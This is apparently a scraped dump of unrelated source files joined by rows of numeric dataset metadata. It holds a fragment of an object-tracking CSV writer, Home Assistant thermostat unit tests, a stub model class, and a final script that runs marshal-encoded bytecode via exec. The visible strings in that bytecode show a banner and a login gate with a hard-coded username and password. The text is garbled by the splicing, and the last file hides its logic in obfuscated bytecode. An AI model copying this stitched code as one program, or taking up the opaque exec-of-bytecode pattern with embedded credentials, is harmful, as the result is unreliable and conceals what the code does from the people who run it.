matchFound = True
else: #We found a pair for this
if not minObj in toPairs: #If this isn't already in toPairs
toPairs[pairIndex] = minObj
toDists[pairIndex] = minDist
pairIndex +=1 #Move to next pairIndex
matchFound = True
else: #If this is already in toPairs
toPairIndex = toPairs.index(minObj)
if toDists[toPairIndex]<=minDist: #If its already used and toDists has a better match
cantUse.append(minObj)
else: #If it's already used but toDists has a worse match
#Set this value
toPairs[pairIndex] = minObj
toDists[pairIndex] = minDist
pairIndex +=1 #Move to next pairIndex
matchFound = True
#reset the old value
toPairs[toPairIndex] = None
toDists[toPairIndex] = float("inf")
#Find a new value (if we can)
if pairIndex<(len(toPairs)-1):
minObj = None
minDist = float("inf")
for index in range(pairIndex, len(toObjects)):
thisDist = objectDistance(fromObjects[toPairIndex], toObjects[index])
if thisDist<minDist and thisDist<threshold:
minObj=toObjects[index]
minDist = thisDist
toPairs[toPairIndex] = minObj
toDists[toPairIndex] = minDist
#Activate the pairs
currEndPair = None
prevEndPair = None
if len(thisFrameObjects)>=len(prevFrameObjects):
currEndPair = thisFrameObjects
prevEndPair = toPairs
else:
currEndPair = toPairs
prevEndPair = prevFrameObjects
#Write out all the pairs
for index in range(0, maxLength):
prevSprite = "None"
thisSprite = "None"
x = 0
y = 0
preX = 0
preY = 0
width = 0
height = 0
velocityX = 0
velocityY = 0
preVelocityX = 0
preVelocityY = 0
preConfidence = 1.0
thisConfidence = 1.0
changeConfidence = 0.0
if not currEndPair[index]==None:
currObj = currEndPair[index]
thisSprite = currObj.name
x = currObj.centerX
y = currObj.centerY
velocityX = currEndPair[index].velocity[0]
velocityY = currEndPair[index].velocity[1]
width = currObj.width
height = currObj.height
thisConfidence = currObj.confidence
if not prevEndPair[index]==None:
prevObj = prevEndPair[index]
prevSprite = prevObj.name
preX = prevObj.centerX
preY = prevObj.centerY
preVelocityX = prevEndPair[index].velocity[0]
preVelocityY = prevEndPair[index].velocity[1]
preConfidence = prevObj.confidence
if currEndPair[index] == None:
x = preX
y = preY
velocityX = preVelocityX
velocityY = preVelocityY
if prevEndPair[index] == None:
preX = x
preY = y
preVelocityX = velocityX
preVelocityY = velocityY
thisConfidence = currObj.confidence
changeConfidence = thisConfidence
writer.writerow([str(thisFrame), prevSprite, thisSprite, str(x), str(y), str(width), str(height), str(velocityX), str(velocityY), str(preVelocityX), str(preVelocityY), str(changeConfidence)])
target.close()
source.close()
| 30.723577
| 217
| 0.684749
| 1,350
| 11,337
| 5.747407
| 0.148148
| 0.015466
| 0.017013
| 0.029385
| 0.824333
| 0.817373
| 0.817373
| 0.811445
| 0.811445
| 0.811445
| 0
| 0.014073
| 0.210285
| 11,337
| 369
| 218
| 30.723577
| 0.852563
| 0.124283
| 0
| 0.874564
| 0
| 0
| 0.041574
| 0.012644
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.010453
| null | null | 0.006969
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
7c4ee8db58f664af4a9779fa60b93c2d5dc4e596
| 21,235
|
py
|
Python
|
tests/components/climate/test_generic_thermostat.py
|
rubund/debian-home-assistant
|
1a3e8f7e4b9ddec60a4380e141fb327d03ac69b5
|
[
"MIT"
] | 1
|
2020-07-17T14:52:56.000Z
|
2020-07-17T14:52:56.000Z
|
tests/components/climate/test_generic_thermostat.py
|
1Forward1Back/home-assistant
|
ce24ef0c20dea0fd671d6f2c2a8b1456b4b66ba6
|
[
"MIT"
] | null | null | null |
tests/components/climate/test_generic_thermostat.py
|
1Forward1Back/home-assistant
|
ce24ef0c20dea0fd671d6f2c2a8b1456b4b66ba6
|
[
"MIT"
] | 1
|
2020-07-17T14:53:53.000Z
|
2020-07-17T14:53:53.000Z
|
"""The tests for the generic_thermostat."""
import datetime
import unittest
from unittest import mock
from homeassistant.core import callback
from homeassistant.bootstrap import setup_component
from homeassistant.const import (
ATTR_UNIT_OF_MEASUREMENT,
SERVICE_TURN_OFF,
SERVICE_TURN_ON,
STATE_ON,
STATE_OFF,
TEMP_CELSIUS,
)
from homeassistant.util.unit_system import METRIC_SYSTEM
from homeassistant.components import climate
from tests.common import assert_setup_component, get_test_home_assistant
ENTITY = 'climate.test'
ENT_SENSOR = 'sensor.test'
ENT_SWITCH = 'switch.test'
MIN_TEMP = 3.0
MAX_TEMP = 65.0
TARGET_TEMP = 42.0
TOLERANCE = 0.5
class TestSetupClimateGenericThermostat(unittest.TestCase):
"""Test the Generic thermostat with custom config."""
def setUp(self): # pylint: disable=invalid-name
"""Setup things to be run when tests are started."""
self.hass = get_test_home_assistant()
def tearDown(self): # pylint: disable=invalid-name
"""Stop down everything that was started."""
self.hass.stop()
def test_setup_missing_conf(self):
"""Test set up heat_control with missing config values."""
config = {
'name': 'test',
'target_sensor': ENT_SENSOR
}
with assert_setup_component(0):
setup_component(self.hass, 'climate', {
'climate': config})
def test_valid_conf(self):
"""Test set up genreic_thermostat with valid config values."""
self.assertTrue(setup_component(self.hass, 'climate',
{'climate': {
'platform': 'generic_thermostat',
'name': 'test',
'heater': ENT_SWITCH,
'target_sensor': ENT_SENSOR}}))
def test_setup_with_sensor(self):
"""Test set up heat_control with sensor to trigger update at init."""
self.hass.states.set(ENT_SENSOR, 22.0, {
ATTR_UNIT_OF_MEASUREMENT: TEMP_CELSIUS
})
assert setup_component(self.hass, climate.DOMAIN, {'climate': {
'platform': 'generic_thermostat',
'name': 'test',
'heater': ENT_SWITCH,
'target_sensor': ENT_SENSOR
}})
state = self.hass.states.get(ENTITY)
self.assertEqual(
TEMP_CELSIUS, state.attributes.get('unit_of_measurement'))
self.assertEqual(22.0, state.attributes.get('current_temperature'))
class TestClimateGenericThermostat(unittest.TestCase):
"""Test the Generic thermostat."""
def setUp(self): # pylint: disable=invalid-name
"""Setup things to be run when tests are started."""
self.hass = get_test_home_assistant()
self.hass.config.units = METRIC_SYSTEM
assert setup_component(self.hass, climate.DOMAIN, {'climate': {
'platform': 'generic_thermostat',
'name': 'test',
'tolerance': 2,
'heater': ENT_SWITCH,
'target_sensor': ENT_SENSOR
}})
def tearDown(self): # pylint: disable=invalid-name
"""Stop down everything that was started."""
self.hass.stop()
def test_setup_defaults_to_unknown(self):
"""Test the setting of defaults to unknown."""
self.assertEqual('idle', self.hass.states.get(ENTITY).state)
def test_default_setup_params(self):
"""Test the setup with default parameters."""
state = self.hass.states.get(ENTITY)
self.assertEqual(7, state.attributes.get('min_temp'))
self.assertEqual(35, state.attributes.get('max_temp'))
self.assertEqual(None, state.attributes.get('temperature'))
def test_custom_setup_params(self):
"""Test the setup with custom parameters."""
self.hass.config.components.remove(climate.DOMAIN)
assert setup_component(self.hass, climate.DOMAIN, {'climate': {
'platform': 'generic_thermostat',
'name': 'test',
'heater': ENT_SWITCH,
'target_sensor': ENT_SENSOR,
'min_temp': MIN_TEMP,
'max_temp': MAX_TEMP,
'target_temp': TARGET_TEMP,
}})
state = self.hass.states.get(ENTITY)
self.assertEqual(MIN_TEMP, state.attributes.get('min_temp'))
self.assertEqual(MAX_TEMP, state.attributes.get('max_temp'))
self.assertEqual(TARGET_TEMP, state.attributes.get('temperature'))
def test_set_target_temp(self):
"""Test the setting of the target temperature."""
climate.set_temperature(self.hass, 30)
self.hass.block_till_done()
state = self.hass.states.get(ENTITY)
self.assertEqual(30.0, state.attributes.get('temperature'))
def test_sensor_bad_unit(self):
"""Test sensor that have bad unit."""
state = self.hass.states.get(ENTITY)
temp = state.attributes.get('current_temperature')
unit = state.attributes.get('unit_of_measurement')
self._setup_sensor(22.0, unit='bad_unit')
self.hass.block_till_done()
state = self.hass.states.get(ENTITY)
self.assertEqual(unit, state.attributes.get('unit_of_measurement'))
self.assertEqual(temp, state.attributes.get('current_temperature'))
def test_sensor_bad_value(self):
"""Test sensor that have None as state."""
state = self.hass.states.get(ENTITY)
temp = state.attributes.get('current_temperature')
unit = state.attributes.get('unit_of_measurement')
self._setup_sensor(None)
self.hass.block_till_done()
state = self.hass.states.get(ENTITY)
self.assertEqual(unit, state.attributes.get('unit_of_measurement'))
self.assertEqual(temp, state.attributes.get('current_temperature'))
def test_set_target_temp_heater_on(self):
"""Test if target temperature turn heater on."""
self._setup_switch(False)
self._setup_sensor(25)
self.hass.block_till_done()
climate.set_temperature(self.hass, 30)
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
call = self.calls[0]
self.assertEqual('switch', call.domain)
self.assertEqual(SERVICE_TURN_ON, call.service)
self.assertEqual(ENT_SWITCH, call.data['entity_id'])
def test_set_target_temp_heater_off(self):
"""Test if target temperature turn heater off."""
self._setup_switch(True)
self._setup_sensor(30)
self.hass.block_till_done()
climate.set_temperature(self.hass, 25)
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
call = self.calls[0]
self.assertEqual('switch', call.domain)
self.assertEqual(SERVICE_TURN_OFF, call.service)
self.assertEqual(ENT_SWITCH, call.data['entity_id'])
def test_temp_change_heater_on_within_tolerance(self):
"""Test if temperature change doesn't turn heater on within
tolerance.
"""
self._setup_switch(False)
climate.set_temperature(self.hass, 30)
self.hass.block_till_done()
self._setup_sensor(29)
self.hass.block_till_done()
self.assertEqual(0, len(self.calls))
def test_temp_change_heater_on_outside_tolerance(self):
"""Test if temperature change turn heater on outside tolerance."""
self._setup_switch(False)
climate.set_temperature(self.hass, 30)
self.hass.block_till_done()
self._setup_sensor(25)
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
call = self.calls[0]
self.assertEqual('switch', call.domain)
self.assertEqual(SERVICE_TURN_ON, call.service)
self.assertEqual(ENT_SWITCH, call.data['entity_id'])
def test_temp_change_heater_off_within_tolerance(self):
"""Test if temperature change doesn't turn heater off within
tolerance.
"""
self._setup_switch(True)
climate.set_temperature(self.hass, 30)
self.hass.block_till_done()
self._setup_sensor(31)
self.hass.block_till_done()
self.assertEqual(0, len(self.calls))
def test_temp_change_heater_off_outside_tolerance(self):
"""Test if temperature change turn heater off outside tolerance."""
self._setup_switch(True)
climate.set_temperature(self.hass, 30)
self.hass.block_till_done()
self._setup_sensor(35)
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
call = self.calls[0]
self.assertEqual('switch', call.domain)
self.assertEqual(SERVICE_TURN_OFF, call.service)
self.assertEqual(ENT_SWITCH, call.data['entity_id'])
def _setup_sensor(self, temp, unit=TEMP_CELSIUS):
"""Setup the test sensor."""
self.hass.states.set(ENT_SENSOR, temp, {
ATTR_UNIT_OF_MEASUREMENT: unit
})
def _setup_switch(self, is_on):
"""Setup the test switch."""
self.hass.states.set(ENT_SWITCH, STATE_ON if is_on else STATE_OFF)
self.calls = []
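# log_call stands in for the real switch services; every call is recorded so
# tests can assert exactly what the thermostat invoked.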
@callback
def log_call(call):
"""Log service calls."""
self.calls.append(call)
self.hass.services.register('switch', SERVICE_TURN_ON, log_call)
self.hass.services.register('switch', SERVICE_TURN_OFF, log_call)
class TestClimateGenericThermostatACMode(unittest.TestCase):
"""Test the Generic thermostat."""
def setUp(self): # pylint: disable=invalid-name
"""Setup things to be run when tests are started."""
self.hass = get_test_home_assistant()
self.hass.config.temperature_unit = TEMP_CELSIUS
assert setup_component(self.hass, climate.DOMAIN, {'climate': {
'platform': 'generic_thermostat',
'name': 'test',
'tolerance': 0.3,
'heater': ENT_SWITCH,
'target_sensor': ENT_SENSOR,
'ac_mode': True
}})
def tearDown(self): # pylint: disable=invalid-name
"""Stop down everything that was started."""
self.hass.stop()
def test_set_target_temp_ac_off(self):
"""Test if target temperature turn ac off."""
self._setup_switch(True)
self._setup_sensor(25)
self.hass.block_till_done()
climate.set_temperature(self.hass, 30)
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
call = self.calls[0]
self.assertEqual('switch', call.domain)
self.assertEqual(SERVICE_TURN_OFF, call.service)
self.assertEqual(ENT_SWITCH, call.data['entity_id'])
def test_set_target_temp_ac_on(self):
"""Test if target temperature turn ac on."""
self._setup_switch(False)
self._setup_sensor(30)
self.hass.block_till_done()
climate.set_temperature(self.hass, 25)
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
call = self.calls[0]
self.assertEqual('switch', call.domain)
self.assertEqual(SERVICE_TURN_ON, call.service)
self.assertEqual(ENT_SWITCH, call.data['entity_id'])
def test_temp_change_ac_off_within_tolerance(self):
"""Test if temperature change doesn't turn ac off within
tolerance.
"""
self._setup_switch(True)
climate.set_temperature(self.hass, 30)
self.hass.block_till_done()
self._setup_sensor(29.8)
self.hass.block_till_done()
self.assertEqual(0, len(self.calls))
def test_set_temp_change_ac_off_outside_tolerance(self):
"""Test if temperature change turn ac off."""
self._setup_switch(True)
climate.set_temperature(self.hass, 30)
self.hass.block_till_done()
self._setup_sensor(25)
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
call = self.calls[0]
self.assertEqual('switch', call.domain)
self.assertEqual(SERVICE_TURN_OFF, call.service)
self.assertEqual(ENT_SWITCH, call.data['entity_id'])
def test_temp_change_ac_on_within_tolerance(self):
"""Test if temperature change doesn't turn ac on within
tolerance.
"""
self._setup_switch(False)
climate.set_temperature(self.hass, 25)
self.hass.block_till_done()
self._setup_sensor(25.2)
self.hass.block_till_done()
self.assertEqual(0, len(self.calls))
def test_temp_change_ac_on_outside_tolerance(self):
"""Test if temperature change turn ac on."""
self._setup_switch(False)
climate.set_temperature(self.hass, 25)
self.hass.block_till_done()
self._setup_sensor(30)
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
call = self.calls[0]
self.assertEqual('switch', call.domain)
self.assertEqual(SERVICE_TURN_ON, call.service)
self.assertEqual(ENT_SWITCH, call.data['entity_id'])
def _setup_sensor(self, temp, unit=TEMP_CELSIUS):
"""Setup the test sensor."""
self.hass.states.set(ENT_SENSOR, temp, {
ATTR_UNIT_OF_MEASUREMENT: unit
})
def _setup_switch(self, is_on):
"""Setup the test switch."""
self.hass.states.set(ENT_SWITCH, STATE_ON if is_on else STATE_OFF)
self.calls = []
@callback
def log_call(call):
"""Log service calls."""
self.calls.append(call)
self.hass.services.register('switch', SERVICE_TURN_ON, log_call)
self.hass.services.register('switch', SERVICE_TURN_OFF, log_call)
class TestClimateGenericThermostatACModeMinCycle(unittest.TestCase):
"""Test the Generic Thermostat."""
def setUp(self): # pylint: disable=invalid-name
"""Setup things to be run when tests are started."""
self.hass = get_test_home_assistant()
self.hass.config.temperature_unit = TEMP_CELSIUS
assert setup_component(self.hass, climate.DOMAIN, {'climate': {
'platform': 'generic_thermostat',
'name': 'test',
'tolerance': 0.3,
'heater': ENT_SWITCH,
'target_sensor': ENT_SENSOR,
'ac_mode': True,
'min_cycle_duration': datetime.timedelta(minutes=10)
}})
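# min_cycle_duration keeps the switch in its current state for at least ten
# minutes before the thermostat may toggle it again.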
def tearDown(self): # pylint: disable=invalid-name
"""Stop down everything that was started."""
self.hass.stop()
def test_temp_change_ac_trigger_on_not_long_enough(self):
"""Test if temperature change turn ac on."""
self._setup_switch(False)
climate.set_temperature(self.hass, 25)
self.hass.block_till_done()
self._setup_sensor(30)
self.hass.block_till_done()
self.assertEqual(0, len(self.calls))
def test_temp_change_ac_trigger_on_long_enough(self):
"""Test if temperature change turn ac on."""
fake_changed = datetime.datetime(1918, 11, 11, 11, 11, 11,
tzinfo=datetime.timezone.utc)
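# Patching utcnow during setup backdates the switch's last state change, so
# the min_cycle_duration check sees it as long since elapsed.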
with mock.patch('homeassistant.helpers.condition.dt_util.utcnow',
return_value=fake_changed):
self._setup_switch(False)
climate.set_temperature(self.hass, 25)
self.hass.block_till_done()
self._setup_sensor(30)
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
call = self.calls[0]
self.assertEqual('switch', call.domain)
self.assertEqual(SERVICE_TURN_ON, call.service)
self.assertEqual(ENT_SWITCH, call.data['entity_id'])
def test_temp_change_ac_trigger_off_not_long_enough(self):
"""Test if temperature change turn ac on."""
self._setup_switch(True)
climate.set_temperature(self.hass, 30)
self.hass.block_till_done()
self._setup_sensor(25)
self.hass.block_till_done()
self.assertEqual(0, len(self.calls))
def test_temp_change_ac_trigger_off_long_enough(self):
"""Test if temperature change turn ac on."""
fake_changed = datetime.datetime(1918, 11, 11, 11, 11, 11,
tzinfo=datetime.timezone.utc)
with mock.patch('homeassistant.helpers.condition.dt_util.utcnow',
return_value=fake_changed):
self._setup_switch(True)
climate.set_temperature(self.hass, 30)
self.hass.block_till_done()
self._setup_sensor(25)
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
call = self.calls[0]
self.assertEqual('switch', call.domain)
self.assertEqual(SERVICE_TURN_OFF, call.service)
self.assertEqual(ENT_SWITCH, call.data['entity_id'])
def _setup_sensor(self, temp, unit=TEMP_CELSIUS):
"""Setup the test sensor."""
self.hass.states.set(ENT_SENSOR, temp, {
ATTR_UNIT_OF_MEASUREMENT: unit
})
def _setup_switch(self, is_on):
"""Setup the test switch."""
self.hass.states.set(ENT_SWITCH, STATE_ON if is_on else STATE_OFF)
self.calls = []
@callback
def log_call(call):
"""Log service calls."""
self.calls.append(call)
self.hass.services.register('switch', SERVICE_TURN_ON, log_call)
self.hass.services.register('switch', SERVICE_TURN_OFF, log_call)
class TestClimateGenericThermostatMinCycle(unittest.TestCase):
"""Test the Generic thermostat."""
def setUp(self): # pylint: disable=invalid-name
"""Setup things to be run when tests are started."""
self.hass = get_test_home_assistant()
self.hass.config.temperature_unit = TEMP_CELSIUS
assert setup_component(self.hass, climate.DOMAIN, {'climate': {
'platform': 'generic_thermostat',
'name': 'test',
'tolerance': 0.3,
'heater': ENT_SWITCH,
'target_sensor': ENT_SENSOR,
'min_cycle_duration': datetime.timedelta(minutes=10)
}})
def tearDown(self): # pylint: disable=invalid-name
"""Stop down everything that was started."""
self.hass.stop()
def test_temp_change_heater_trigger_off_not_long_enough(self):
"""Test if temp change doesn't turn heater off because of time."""
self._setup_switch(True)
climate.set_temperature(self.hass, 25)
self.hass.block_till_done()
self._setup_sensor(30)
self.hass.block_till_done()
self.assertEqual(0, len(self.calls))
def test_temp_change_heater_trigger_on_not_long_enough(self):
"""Test if temp change doesn't turn heater on because of time."""
self._setup_switch(False)
climate.set_temperature(self.hass, 30)
self.hass.block_till_done()
self._setup_sensor(25)
self.hass.block_till_done()
self.assertEqual(0, len(self.calls))
def test_temp_change_heater_trigger_on_long_enough(self):
"""Test if temperature change turn heater on after min cycle."""
fake_changed = datetime.datetime(1918, 11, 11, 11, 11, 11,
tzinfo=datetime.timezone.utc)
with mock.patch('homeassistant.helpers.condition.dt_util.utcnow',
return_value=fake_changed):
self._setup_switch(False)
climate.set_temperature(self.hass, 30)
self.hass.block_till_done()
self._setup_sensor(25)
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
call = self.calls[0]
self.assertEqual('switch', call.domain)
self.assertEqual(SERVICE_TURN_ON, call.service)
self.assertEqual(ENT_SWITCH, call.data['entity_id'])
def test_temp_change_heater_trigger_off_long_enough(self):
"""Test if temperature change turn heater off after min cycle."""
fake_changed = datetime.datetime(1918, 11, 11, 11, 11, 11,
tzinfo=datetime.timezone.utc)
with mock.patch('homeassistant.helpers.condition.dt_util.utcnow',
return_value=fake_changed):
self._setup_switch(True)
climate.set_temperature(self.hass, 25)
self.hass.block_till_done()
self._setup_sensor(30)
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
call = self.calls[0]
self.assertEqual('switch', call.domain)
self.assertEqual(SERVICE_TURN_OFF, call.service)
self.assertEqual(ENT_SWITCH, call.data['entity_id'])
def _setup_sensor(self, temp, unit=TEMP_CELSIUS):
"""Setup the test sensor."""
self.hass.states.set(ENT_SENSOR, temp, {
ATTR_UNIT_OF_MEASUREMENT: unit
})
def _setup_switch(self, is_on):
"""Setup the test switch."""
self.hass.states.set(ENT_SWITCH, STATE_ON if is_on else STATE_OFF)
self.calls = []
@callback
def log_call(call):
"""Log service calls."""
self.calls.append(call)
self.hass.services.register('switch', SERVICE_TURN_ON, log_call)
self.hass.services.register('switch', SERVICE_TURN_OFF, log_call)
| 38.679417
| 77
| 0.640075
| 2,618
| 21,235
| 4.953018
| 0.067227
| 0.069715
| 0.043109
| 0.056374
| 0.900671
| 0.885556
| 0.860492
| 0.826637
| 0.799799
| 0.784761
| 0
| 0.013071
| 0.247045
| 21,235
| 548
| 78
| 38.75
| 0.797924
| 0.123334
| 0
| 0.773171
| 0
| 0
| 0.070564
| 0.010081
| 0
| 0
| 0
| 0
| 0.192683
| 1
| 0.12439
| false
| 0
| 0.021951
| 0
| 0.158537
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7c8475b2bd5948c05b213222fa506ea5a494fa40
| 108
|
py
|
Python
|
tests/samples/project/vendor/fooba/models/config_dependency_inheritance.py
|
machinable-org/machinable
|
9d96e942dde05d68699bc7bc0c3d062ee18652ad
|
[
"MIT"
] | 23
|
2020-02-28T14:29:04.000Z
|
2021-12-23T20:50:54.000Z
|
tests/samples/project/vendor/fooba/models/config_dependency_inheritance.py
|
machinable-org/machinable
|
9d96e942dde05d68699bc7bc0c3d062ee18652ad
|
[
"MIT"
] | 172
|
2020-02-24T12:12:11.000Z
|
2022-03-29T03:08:24.000Z
|
tests/samples/project/vendor/fooba/models/config_dependency_inheritance.py
|
machinable-org/machinable
|
9d96e942dde05d68699bc7bc0c3d062ee18652ad
|
[
"MIT"
] | 1
|
2020-11-23T22:42:20.000Z
|
2020-11-23T22:42:20.000Z
|
from .extended import ExtendedTestModel
class DependencyInhertanceTestModel(ExtendedTestModel):
pass
| 15.428571
| 55
| 0.833333
| 8
| 108
| 11.25
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12963
| 108
| 6
| 56
| 18
| 0.957447
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
7c91cd3d5d3b8cbd42c3d7319a68397e3a3119c4
| 4,508
|
py
|
Python
|
Noprian/Noprian-enc/.password.py
|
shyamjangid07/Reverse-Engineering
|
469efabcd6057f7895d8d891f1fabdf2ffe730b0
|
[
"Apache-2.0"
] | 337
|
2020-08-15T12:22:14.000Z
|
2022-03-29T06:05:15.000Z
|
Noprian/Noprian-enc/.password.py
|
Wh014M/Reverse-Engineering
|
f7aae2c43f7ea4a6730964d085c07814b6660a53
|
[
"Apache-2.0"
] | 3
|
2020-11-12T14:30:48.000Z
|
2021-05-18T16:56:22.000Z
|
Noprian/Noprian-enc/.password.py
|
Wh014M/Reverse-Engineering
|
f7aae2c43f7ea4a6730964d085c07814b6660a53
|
[
"Apache-2.0"
] | 83
|
2020-08-15T00:22:58.000Z
|
2022-03-31T08:40:23.000Z
|
import marshal
exec(marshal.loads('''c\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00@\x00\x00\x00s\xed\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x01\x00l\x02\x00Z\x02\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x03\x00Z\x03\x00e\x02\x00j\x04\x00Z\x04\x00d\x00\x00d\x01\x00l\x05\x00Z\x05\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x02\x00\x84\x00\x00Z\x06\x00e\x06\x00d\x03\x00\x83\x01\x00\x01e\x06\x00d\x04\x00\x83\x01\x00\x01e\x06\x00d\x04\x00\x83\x01\x00\x01d\x05\x00GHd\x06\x00GHd\x04\x00GHd\x04\x00GHd\x07\x00Z\x07\x00d\x08\x00Z\x08\x00d\t\x00\x84\x00\x00Z\t\x00d\n\x00\x84\x00\x00Z\n\x00y\x0b\x00e\n\x00\x83\x00\x00\x01Wn%\x00\x04e\x0b\x00k\n\x00r\xe8\x00\x01\x01\x01e\x00\x00j\x0c\x00d\x0b\x00\x83\x01\x00\x01e\t\x00\x83\x00\x00\x01n\x01\x00Xd\x01\x00S(\x0c\x00\x00\x00i\xff\xff\xff\xffNc\x01\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\x84\x00\x00\x00i\x06\x00d\x01\x00d\x02\x006d\x03\x00d\x04\x006d\x05\x00d\x06\x006d\x07\x00d\x08\x006d\t\x00d\n\x006d\x0b\x00d\x0c\x006}\x01\x00x,\x00|\x01\x00D]$\x00}\x02\x00|\x00\x00j\x00\x00d\r\x00|\x02\x00\x16d\x0e\x00|\x01\x00|\x02\x00\x19\x16\x83\x02\x00}\x00\x00q7\x00W|\x00\x00d\x0f\x007}\x00\x00|\x00\x00j\x00\x00d\x10\x00d\x0f\x00\x83\x02\x00}\x00\x00|\x00\x00GHd\x00\x00S(\x11\x00\x00\x00Ni\x1f\x00\x00\x00t\x01\x00\x00\x00mi \x00\x00\x00t\x01\x00\x00\x00hi!\x00\x00\x00t\x01\x00\x00\x00ki"\x00\x00\x00t\x01\x00\x00\x00bi#\x00\x00\x00t\x01\x00\x00\x00pi$\x00\x00\x00t\x01\x00\x00\x00cs\x03\x00\x00\x00\r%ss\x07\x00\x00\x00\x1b[%s;1ms\x04\x00\x00\x00\x1b[0ms\x02\x00\x00\x00\r0(\x01\x00\x00\x00t\x07\x00\x00\x00replace(\x03\x00\x00\x00t\x01\x00\x00\x00xt\x01\x00\x00\x00wt\x01\x00\x00\x00i(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>t\x06\x00\x00\x00tampil\x07\x00\x00\x00s\x0c\x00\x00\x00\x00\x010\x01\r\x01"\x01\n\x01\x12\x01s\xdb\x00\x00\x00\rh\n ___ ___ _ _ \n | __| | _ ) | || | \rk*\rcAsecC|~|eror404\n | _| | _ \\ | __ | \n _|_|_ |___/ |_||_| \n \rp |"""""|| """ |\rmHaxID\rp|"""""||"""""| \n "`-0-0-\'"`-0-0-\'"`-0-0-\' t\x00\x00\x00\x00s1\x00\x00\x00\x1b[36;1mSilahkan Masukkan Username & Password Andas4\x00\x00\x00\x1b[36;1matau silahkan Hubungi \x1b[31;1mAsecC|~|eror404 t\x05\x00\x00\x00AsecCt\x07\x00\x00\x00eror404c\x00\x00\x00\x00\x01\x00\x00\x00\x04\x00\x00\x00C\x00\x00\x00s#\x00\x00\x00t\x00\x00j\x01\x00}\x00\x00t\x02\x00j\x03\x00|\x00\x00|\x00\x00t\x00\x00j\x04\x00\x8c\x02\x00\x01d\x00\x00S(\x01\x00\x00\x00N(\x05\x00\x00\x00t\x03\x00\x00\x00syst\n\x00\x00\x00executablet\x02\x00\x00\x00ost\x05\x00\x00\x00execlt\x04\x00\x00\x00argv(\x01\x00\x00\x00t\x07\x00\x00\x00ngulang(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>t\x07\x00\x00\x00restart\'\x00\x00\x00s\x04\x00\x00\x00\x00\x02\t\x02c\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\\\x00\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00t\x01\x00k\x02\x00rN\x00t\x00\x00d\x02\x00\x83\x01\x00}\x01\x00|\x01\x00t\x02\x00k\x02\x00rA\x00d\x03\x00Gt\x03\x00j\x04\x00\x83\x00\x00\x01qX\x00d\x04\x00GHd\x05\x00GHn\n\x00d\x06\x00GHd\x07\x00GHd\x00\x00S(\x08\x00\x00\x00Ns\x12\x00\x00\x00\x1b[32;1mUsername : s\x12\x00\x00\x00\x1b[31;1mPassword : s\x17\x00\x00\x00\x1b[1;32mLogin berhasil..s8\x00\x00\x00\x1b[1;32mMaaf password yang anda masukan salah... [?]\x1b[00ms\x18\x00\x00\x00Silahkan Coba lagi...!!\ns8\x00\x00\x00\x1b[1;32mMaaf username yang anda masukan salah... 
